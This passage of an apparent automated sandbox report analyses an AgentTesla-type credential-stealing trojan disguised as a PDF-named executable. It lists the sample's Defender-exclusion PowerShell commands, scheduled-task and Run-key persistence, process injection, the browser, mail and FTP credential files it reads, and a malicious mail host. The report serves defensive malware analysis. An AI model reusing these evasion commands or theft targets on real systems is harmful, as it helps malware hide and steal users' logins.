                    Source: eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: BjTxJte.exe, 00000014.00000002.3276901832.0000000001710000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Memory written: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Memory written: C:\Users\user\AppData\Roaming\eeBIYZL.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Memory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Process created: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Process created: C:\Users\user\AppData\Roaming\eeBIYZL.exe "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq3<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}rTejqTL
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq3<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq9<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}rTHoq8
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002909000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 2.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:=
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRjq`
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}r
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000289F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq8<b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}THoq8
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq8<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>{Win}THoq
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: @\jqDTime: 05/25/2024 17:47:32<br>User Name: user<br>Computer Name: 035347<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 102.129.152.220<br><hr><b>[ Program Manager]</b> (27/04/2024 01:25:51)<br>{Win}r
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLRjq
                    Source: eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $jq9<b>[ Program Manager]</b> (26/04/2024 11:43:08)<br>{Win}rTHoq
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Users\user\AppData\Roaming\eeBIYZL.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 3 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 22 Software Packing | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    [Behavior graph: ID 1432007; Sample: SOA FOR APR 2024 PDF.exe; Start date: 26/04/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
SOA FOR APR 2024 PDF.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
SOA FOR APR 2024 PDF.exe | 52% | Virustotal | | Browse
SOA FOR APR 2024 PDF.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\eeBIYZL.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe | 52% | Virustotal | | Browse
C:\Users\user\AppData\Roaming\eeBIYZL.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
C:\Users\user\AppData\Roaming\eeBIYZL.exe | 52% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
mail.fascia-arch.com | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://r3.o.lencr.org0 | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe |
http://mail.fascia-arch.com | 0% | Avira URL Cloud | safe |
http://x1.c6 | 0% | Avira URL Cloud | safe |
http://mail.fascia-arch.com | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
mail.fascia-arch.com | 50.87.195.61 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
50.87.195.61 | mail.fascia-arch.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | true

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1432007
                                Start date and time:2024-04-26 09:01:05 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SOA FOR APR 2024 PDF.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 414
                                • Number of non-executed functions: 32
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

Time | Type | Description
09:01:52 | API Interceptor | 1545495x Sleep call for process: SOA FOR APR 2024 PDF.exe modified
09:01:56 | Task Scheduler | Run new task: eeBIYZL path: C:\Users\user\AppData\Roaming\eeBIYZL.exe
09:01:56 | API Interceptor | 26x Sleep call for process: powershell.exe modified
09:01:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
09:01:59 | API Interceptor | 204478x Sleep call for process: eeBIYZL.exe modified
09:02:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
09:02:09 | API Interceptor | 978557x Sleep call for process: BjTxJte.exe modified

                                Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
